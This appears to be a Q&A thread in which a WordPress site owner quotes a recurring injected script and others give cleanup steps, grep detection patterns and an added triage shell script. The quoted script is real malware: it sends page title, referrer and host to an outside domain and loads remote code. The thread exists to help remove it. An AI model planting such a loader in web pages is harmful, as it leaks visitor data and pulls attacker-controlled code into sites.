Rob4236

Reputation: 395

jQuery.min.php Malware on my site

Looking for some help from anyone who is familiar with jQuery malware. I have been infected with an injected script in my WordPress website, and every time I remove the injected code from my Header.php, 24 hours later it has injected a modified version of it back into the Header.php files on my hosting server.

Driving me crazy. The site is www.icrsolutions.co.uk and the script reads below:

<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>

Upvotes: 0

Views: 6121

Answers (2)

Mike H

Reputation: 160

The following applies to Joomla as well:

  1. Change all your passwords.
  2. Update your installation and any add-ons/modules to the latest versions.
  3. Identify and clean all files containing the malicious script. On Linux, you can use the following to find the files:

         grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'

  4. Clean all files containing any "payload". On Linux, you can use the following to identify those files. There will be false positives, so when in doubt, check the file against a fresh copy of your CMS.

         egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null

Upvotes: 4
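
Steps 3 and 4 of the answer above, combined with its advice to check doubtful hits against a fresh copy of the CMS, as an added example that is not part of the original answer. The function names, the verdict labels, and the demo tree are assumptions made for illustration; the two patterns are the ones from the answer (with the dots in the loader name escaped).

```shell
#!/bin/sh
# Added example: triage the grep hits against a clean copy of the CMS.
LOADER_RE='jquery\.min\.php'   # reference to the injected loader
PAYLOAD_RE='\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval'

# triage_webroot <webroot> <clean-copy>   (hypothetical helper)
# Prints one tab-separated line per matching file: verdict, kind, relative path.
triage_webroot() (
    webroot=${1%/}; clean=${2%/}
    for kind in LOADER PAYLOAD; do
        if [ "$kind" = LOADER ]; then re=$LOADER_RE; else re=$PAYLOAD_RE; fi
        # Newline-delimited list: assumes no newlines in file names.
        grep -rlE -e "$re" "$webroot" 2>/dev/null | sort |
        while IFS= read -r file; do
            rel=${file#"$webroot"/}
            if [ ! -e "$clean/$rel" ]; then
                verdict=NOT_IN_CLEAN_COPY   # upload, theme file, or dropped file
            elif cmp -s "$file" "$clean/$rel"; then
                verdict=SAME_AS_CLEAN       # false positive: stock CMS code
            else
                verdict=MODIFIED            # differs from stock: inspect or replace
            fi
            printf '%s\t%s\t%s\n' "$verdict" "$kind" "$rel"
        done
    done
)

# Constructed sample trees (inert text, not real site content) for a dry run.
make_demo_trees() {
    demo=$(mktemp -d) || return 1
    mkdir -p "$demo/live/wp-content/uploads" "$demo/live/wp-includes" "$demo/clean/wp-includes"
    printf '%s\n' '<?php // stock header' > "$demo/clean/header.php"
    printf '%s\n' '<?php // stock header' \
        'var base = "http://example.invalid/js/jquery.min.php";' > "$demo/live/header.php"
    printf '%s\n' '<?php $v = $_COOKIE["wp-settings"];' > "$demo/clean/wp-includes/option.php"
    cp "$demo/clean/wp-includes/option.php" "$demo/live/wp-includes/option.php"
    printf '%s\n' '<?php /* constructed marker: isset(...) then eval(...) */' \
        > "$demo/live/wp-content/uploads/cache.php"
    printf '%s\n' "$demo"
}
```

Files reported as MODIFIED or NOT_IN_CLEAN_COPY are the ones to review by hand; SAME_AS_CLEAN hits are the false positives the answer warns about.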

Josip Ivic

Reputation: 3709

Change every password and then delete the scripts / malicious code.

Then after that, update every plugin, and WordPress itself.

Upvotes: 1
